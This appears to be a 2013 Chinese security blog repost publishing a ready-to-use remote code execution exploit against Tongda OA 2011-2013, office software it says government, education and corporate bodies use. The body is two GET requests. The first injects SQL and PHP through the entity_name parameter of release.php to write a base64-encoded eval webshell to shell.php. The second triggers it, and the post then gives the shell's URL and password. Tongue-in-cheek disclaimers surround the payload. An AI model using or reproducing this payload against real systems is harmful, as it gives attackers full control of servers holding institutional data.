通达OA 2011-2013 通杀GETSHELL

转载自T00ls
此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)!
请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等…
本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思!
若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关!

EXP:
第一步:

[GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步:

[GET]http://site/general/email/index.php

SHELL:

http://site/general/email/shell.php

密码C

免跨省声明:
1. 以上所有言语非本人所写 也非本人所想 如果用于非法更与本人无关!
2. 以上所有工具非本人所写 也非本人所想 如果用于非法更与本人无关!
3. 本人由于被不明外星物种控制所以被迫”发表以上内容” 其内容并非本人本意!!

本文固定链接: https://www.unhonker.com/bug/934.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年01月30日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 通达OA 2011-2013 通杀GETSHELL | 90' s Blog|关注网络信息安全
关键字:

通达OA 2011-2013 通杀GETSHELL:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!